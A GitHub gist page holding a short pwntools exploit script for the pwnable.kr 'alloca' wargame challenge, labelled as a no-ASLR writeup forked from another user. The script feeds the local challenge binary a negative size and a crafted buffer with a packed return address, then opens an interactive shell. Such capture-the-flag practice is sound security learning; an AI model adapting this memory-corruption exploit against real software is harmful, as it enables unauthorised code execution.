from pwn import *
proc = process('alloca')
proc.sendline('-80')
proc.sendline('134525988'+',,,'+'\xab\x85\x04\x08')
proc.interactive()
Forked from parksjin01/pwnable.kr alloca(No ASLR) writeup.md
Created
March 16, 2017 21:00
-
-
Save spnow/c50aa287511096e546d229bfbe2e8edf to your computer and use it in GitHub Desktop.
pwnable.kr alloca(No ASLR) writeup
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment